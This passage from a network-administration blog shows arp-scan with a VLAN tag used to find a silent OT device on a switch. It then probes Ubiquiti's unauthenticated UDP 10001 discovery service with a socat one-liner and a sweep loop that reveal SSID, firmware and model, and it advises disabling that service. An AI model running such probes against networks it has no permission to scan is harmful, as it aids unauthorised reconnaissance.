<h4 style="line-height: 100%; margin-bottom: 0in;">
</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-size: small;"><i><b>sudo arp-scan -I enp2s0f1 -Q 46 --destaddr=00:90:9e:9a:b5:3d 10.112.100.0/24</b></i></span><br /><span style="color: red;"><span style="font-size: x-small;">WARNING: Could not obtain IP address for interface enp2s0f1. Using 0.0.0.0 for<br />the source address, which is probably not what you want.</span></span><span style="font-size: x-small;"><br />Either configure enp2s0f1 with an IP address, or manually specify the address<br />with the --arpspa option.<br />Interface: enp2s0f1, datalink type: EN10MB (Ethernet)<br />Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)<br /><span style="color: red;">10.112.100.1 00:90:9e:9a:b5:3d Critical IO, LLC (802.1Q VLAN=46)</span></span></span><br />
<br />
<span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;">1 packets received by filter, 0 packets dropped by kernel<br />Ending arp-scan 1.9: 256 hosts scanned in 2.556 seconds (100.16 hosts/sec). 1 responded</span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
You can see that arp-scan found the device by mac address and the device replied with its IP address.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Here is what it looked like in Wireshark on the Ubuntu box:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuFXsebjmie_PEywPYRscFtEpuj4y2p6KG3nrTMgfseXi3EpCU8KY2flbOBgv9hhSy7NNUeQ_N0vuleYU40TcUr8QjSjKWKnxDRP9Oxf3xzIH1advto4-P3uX9cpNtSIviiSYCM5rPhUmy/s1600/Arp-scan-vlan-tag.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="357" data-original-width="1300" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuFXsebjmie_PEywPYRscFtEpuj4y2p6KG3nrTMgfseXi3EpCU8KY2flbOBgv9hhSy7NNUeQ_N0vuleYU40TcUr8QjSjKWKnxDRP9Oxf3xzIH1advto4-P3uX9cpNtSIviiSYCM5rPhUmy/s640/Arp-scan-vlan-tag.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
You can see that arp-scan sent 802.1q tag 46 even though I hadn't configured a subinterface on the Ubuntu box. I have a blog showing how to configure Ubuntu to use vlan tags. Here is a link to the blog - <a href="https://mwhubbard.blogspot.com/2016/12/bypass-vty-access-lists-with-with-linux.html">Bypass VTY access lists with Linux and Yersinia</a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
Now on the switch, look for the mac address. </div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /><b><i>sh mac add | i 0090.9e9a.b53d</i></b> <br /> 46 0090.9e9a.b53d DYNAMIC Gi1/0/48</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
You can either move the device to the correct port or reconfigure the port for the correct vlan. If the customer allows it, I like to label this type of device's switch port like this:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;">des < BACnet 10.112.100.1 0090.9e9a.b53d></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
That gives me the MAC and IP for future troubleshooting. </div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h3>
Let's set up a lab to learn how to use arp-scan.</h3>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
It's a simple setup, but there are few gotcha's if you are new to Linux or arp-scan. You will need a Linux machine, physical or virtual, and a Kali Linux virtual machine. The Kali VM will simulate our OT device because it is designed to be quiet on the network. The kali motto is "The quieter you are, the more you can hear".</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
We will use the same network layout as above so you can refer to that diagram.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h3>
On the Kali VM</h3>
<div style="line-height: 100%; margin-bottom: 0in;">
Configure Kali with a static ip address. In this example:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
<span style="font-family: "courier new" , "courier" , monospace;">10.112.100.1/24<br />255.255.255.0<br />NO GATEWAY</span> - If you assign a gateway the Kali box will send ARP requests to the gateway and populate the switch's mac address table.<br />
<br />
Connect the Kali VM to switch port g1/0/48</div>
<div style="line-height: 100%; margin-bottom: 0in;">
Check to see if the Kali box sent traffic that caused the switch to record it's MAC address:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sh mac add int g1/0/48</b></i> </span> <br />
<span style="font-family: "courier new" , "courier" , monospace;"> <span style="font-size: x-small;">Mac Address Table <br />------------------------------------------- <br /> <br />Vlan Mac Address Type Ports <br />---- ----------- -------- ----- <br /> 46 0090.9e9a.b53d DYNAMIC Gi1/0/48 <br />Total Mac Addresses for this criterion: 1 </span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Kali did send some traffic and that populated the mac address table. For our purposes, we need to make sure the Kali box isn't sending any traffic. Normally, you do not want your pen test box to send traffic you didn't explicitly request. That is why Kali has DHCP and other services disabled by default. </div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
In this case, I had been using DHCP before switching to static so the dhclient service was still running.<br />
<br />
On Kali run</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>ps -ef | grep dh</b></i></span><br />
root 2500 2125 0 13:18 pts/0 00:00:00 dhclient -v<br />
<br />
If you see the dhclient service, then run<br />
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>dhclient -r</b></i></span><br />
<br />
<br />
to stop the service. If you don't stop it, the dhclient service will do a discover which will populate the MAC-address table on the switch and invalidates the test we are about to try.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Next, run the following to clear the mac address on the switch port. Sometimes you need to run it a few times before the address is cleared.<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /><i><b>clear mac address-table dynamic interface g1/0/48</b></i></span><br />
<br />
Finally, you should see an empty mac table for interface g1/0/48<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sh mac add int g1/0/48 </b></i> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> Mac Address Table</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">-------------------------------------------</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">Vlan Mac Address Type Ports</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">---- ----------- -------- -----</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Try to ping the device<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>ping 10.112.100.1</b></i></span><br />
<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.112.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Connect your laptop to port 1/0/47. I run the lldpd daemon (sudo apt install lldpd) so I can verify that the laptop is connected using the following.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sh lldp ne</b></i></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Capability codes:<br /> (R) Router, (B) Bridge, (T) Telephone, (C) DOCSIS Cable Device<br /> (W) WLAN Access Point, (P) Repeater, (S) Station, (O) Other<br /><br />Device ID Local Intf Hold-time Capability Port ID<br />PROCURVE J9450A Gi1/1/4 120 B 2<br />1S1K-SYS76 <span style="color: red;">Gi1/0/47</span> 120 B,W,R 80fa.5b31.de85<br /><br />Total entries displayed: 2</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4>
Look at the interface that the laptop is connected to:</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<b>sh run int g1/0/47</b><br />
<br />
interface GigabitEthernet<span style="color: red;">1/0/47</span><br />
switchport trunk encapsulation dot1q<br />
switchport mode trunk<br />
end</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4 style="line-height: 100%; margin-bottom: 0in;">
Look at the interface on the laptop after it's connected to the switch</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
<i><b><br /></b></i></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<i><b>ip addr show enp2s0f1 </b></i></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;">2: enp2s0f1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000<br /> link/ether 80:fa:5b:31:de:85 brd ff:ff:ff:ff:ff:ff<br /> inet6 fe80::6d35:51a0:cef:4475/64 scope link noprefixroute <br /> valid_lft forever preferred_lft forever</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
You can see that the interface is UP/UP but doesn't have an IP address.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4 style="line-height: 100%; margin-bottom: 0in;">
Look at the SVIs</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<i><b>sh run int vl 46</b></i><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">interface Vlan46<br /> ip address 10.112.47.254 255.255.254.0<br /> ip helper-address 192.168.10.221<br /> no ip redirects<br />end</span><br />
<br />
<i><b>sh run int vl 100</b></i><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">interface Vlan100<br /> ip address 10.112.100.254 255.255.255.0<br /> ip helper-address 192.168.10.221<br /> no ip redirects<br />end</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
Now we are ready to run arp-scan and find the device:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sudo arp-scan -I enp2s0f1 -Q 46 --destaddr=00:90:9e:9a:b5:3d 10.112.100.0/24</b></i></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
WARNING: Could not obtain IP address for interface enp2s0f1. Using 0.0.0.0 for<br />
the source address, which is probably not what you want.<br />
Either configure enp2s0f1 with an IP address, or manually specify the address<br />
with the --arpspa option.<br />
Interface: enp2s0f1, datalink type: EN10MB (Ethernet)<br />
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)<br />
10.112.100.1 00:90:9e:9a:b5:3d Critical IO, LLC (802.1Q VLAN=46)<br />
<br />
1 packets received by filter, 0 packets dropped by kernel<br />
Ending arp-scan 1.9: 256 hosts scanned in 2.556 seconds (100.16 hosts/sec). 1 responded<br />
<br />
<br />
<br />
<h4>
Verify that the mac-address table on the switch has been updated</h4>
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sh mac add | i 0090.9e9a.b53d</b></i> <br /> 46 0090.9e9a.b53d DYNAMIC Gi1/0/48</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<style type="text/css">p { margin-bottom: 0.1in; line-height: 115%; }</style>@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com1tag:blogger.com,1999:blog-690329124282786689.post-38156432631993111112019-02-08T19:50:00.000-08:002019-02-11T14:42:25.322-08:00Ubiquiti Discovery Protocol - Find the firmware version-SSID-ModelUbiquiti devices use UDP on port 10001 for autodiscover of other Ubiquiti devices. If you are hard coding IPs and managing the devices individually, you can disable this discovery process. The references below have two links to Ubiquiti KBs on the issue. Here are the instructions:<br />
<br />
SSH into the device<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">ssh</span> <span style="color: white;"><username>@IP-Address</span>
<span style="color: white;">configure</span>
<span style="color: white;">set</span> <span style="color: white;">service</span> <span style="color: white;">ubnt-discover</span> <span style="color: white;">interface</span> <span style="color: white;"><interface-name></span> <span style="color: white;">disable</span>
<span style="color: white;">commit</span>
<span style="color: white;">save</span>
</pre>
</div>
<br />
On a router, you will definitely want to disable it on the WAN interface. If you are using Ubiquiti's cloud management you will need to verify that it works after making this change.<br />
<br />
SSH into the device<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">ssh</span> <span style="color: white;"><username>@IP-Address</span>
<span style="color: white;">configure</span>
<span style="color: white;">set</span> <span style="color: white;">service</span> <span style="color: white;">ubnt-discover</span> <span style="color: white;">interface</span> <span style="color: white;"><interface-name></span> <span style="color: white;">disable</span>
<span style="color: white;">commit</span>
<span style="color: white;">save</span>
</pre>
</div>
<br />
To look at what the discover sends out, you can use the following commands. No authentication is required to get the output. As with all network devices, you should use a dedicated management vlan and ACL it off so that only authorized stations can access the management interface.<br />
<br />
This is from a NanoStation 5 AC loco in my lab. It has the following settings:<br />
<br />
<ul>
<li>SSID - death2all</li>
<li>firmware version - WA.v8.5.11.39842.190109.1449.bin</li>
<li>Device name - Office</li>
</ul>
<!-- HTML generated using hilite.me -->echo -ne "\x01\x00\x00\x00" | socat -t 1 udp:192.168.10.50:10001 - | hexdump -C<br />
<br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">echo</span> <span style="color: white;">-ne</span> <span style="color: #0086d2;">"\x01\x00\x00\x00"</span> <span style="color: white;">|</span> <span style="color: white;">socat</span> <span style="color: white;">-t</span> <span style="color: #0086f7; font-weight: bold;">1</span> <span style="color: white;">udp:</span><span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.50</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">10001</span> <span style="color: white;">-</span> <span style="color: white;">|</span> <span style="color: white;">hexdump</span> <span style="color: white;">-C</span>
<span style="color: #0086f7; font-weight: bold;">00000000</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: white;">|...........nU...|</span>
<span style="color: #0086f7; font-weight: bold;">00000010</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: white;">c0</span> <span style="color: white;">a8</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: #0086f7; font-weight: bold;">32</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">|....nU...</span><span style="color: #0086f7; font-weight: bold;">2.</span><span style="color: white;">.....|</span>
<span style="color: #0086f7; font-weight: bold;">00000020</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: white;">a9</span> <span style="color: white;">fe</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">23</span> <span style="color: #0086f7; font-weight: bold;">57</span> <span style="color: #0086f7; font-weight: bold;">41</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">72</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: white;">|.nU..nU..</span><span style="background-color: #0f140f; color: #008800; font-style: italic;">#WA.ar9|</span>
<span style="color: #0086f7; font-weight: bold;">00000030</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">78</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">76</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">34</span><span style="color: white;">x.v8.</span><span style="color: #0086f7; font-weight: bold;">5.11</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">3984</span><span style="color: white;">|</span>
<span style="color: #0086f7; font-weight: bold;">00000040</span> <span style="color: #0086f7; font-weight: bold;">32</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">30</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">30</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">04</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">2.190109</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">1449.</span><span style="color: white;">..|</span>
<span style="color: #0086f7; font-weight: bold;">00000050</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">69</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">66</span> <span style="color: #0086f7; font-weight: bold;">66</span> <span style="color: #0086f7; font-weight: bold;">69</span> <span style="color: #0086f7; font-weight: bold;">63</span> <span style="color: #0086f7; font-weight: bold;">65</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: white;">|..</span><span style="color: #0086f7; font-weight: bold;">8</span><span style="color: white;">i...Office...|</span>
<span style="color: #0086f7; font-weight: bold;">00000060</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">d</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">09</span> <span style="color: #0086f7; font-weight: bold;">64</span> <span style="color: #0086f7; font-weight: bold;">65</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">68</span> <span style="color: #0086f7; font-weight: bold;">32</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">e</span> <span style="color: white;">|N5L...death2all.|</span>
<span style="color: #0086f7; font-weight: bold;">00000070</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: #0086f7; font-weight: bold;">10</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: white;">e7</span> <span style="color: white;">fa</span> <span style="color: #0086f7; font-weight: bold;">13</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: white;">|...............n|</span>
<span style="color: #0086f7; font-weight: bold;">00000080</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: #0086f7; font-weight: bold;">14</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">14</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">53</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">69</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: white;">|U...NanoStation</span> <span style="color: white;">|</span>
<span style="color: #0086f7; font-weight: bold;">00000090</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">41</span> <span style="color: #0086f7; font-weight: bold;">43</span> <span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">63</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">18</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">04</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">AC</span> <span style="color: white;">loco.......|</span>
</pre>
</div>
<br />
<h4>
Explanation of the Linux commands</h4>
<div>
<br /></div>
<b>Echo</b><br />
echo the STRING(s) to standard output.<br />
-n do not output the trailing newline<br />
-e enable interpretation of backslash escapes<br />
<br />
<b class="">socat</b><br />
Socat is like the cat command but it can transfer data between two locations instead of just from a file to stdout.<br />
-t Delay<br />
- Write to stdout<br />
<br />
<b class="">hexdump</b><br />
From the man page - The hexdump utility is a filter which displays the specified files, or the standard input, if no files are specified, in a user specified format.<br />
-C Canonical hex+ASCII display. Display the input offset in hexadecimal, followed by sixteen space-separated, two column, hexadecimal bytes, followed by the same sixteen bytes in %_p format enclosed in ``|'' characters.<br />
<br />
To look for multiple devices, you can use this simple loop. Change the IP to match your network.<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">ip</span> <span style="color: white;">in</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.</span><span style="color: white;">{</span><span style="color: #0086f7; font-weight: bold;">50.</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">51</span><span style="color: white;">}</span>
<span style="color: white;">do</span>
<span style="color: white;">echo</span> <span style="color: #0086d2;">"------ ${ip} ------"</span>
<span style="color: white;">echo</span> <span style="color: white;">-ne</span> <span style="color: #0086d2;">"\x01\x00\x00\x00"</span> <span style="color: white;">|</span> <span style="color: white;">socat</span> <span style="color: white;">-t</span> <span style="color: #0086f7; font-weight: bold;">1</span> <span style="color: white;">udp:$ip:</span><span style="color: #0086f7; font-weight: bold;">10001</span> <span style="color: white;">-</span> <span style="color: white;">|</span> <span style="color: white;">hexdump</span> <span style="color: white;">-C</span>
<span style="color: white;">done</span>
<span style="color: white;">------</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.50</span> <span style="color: white;">------</span>
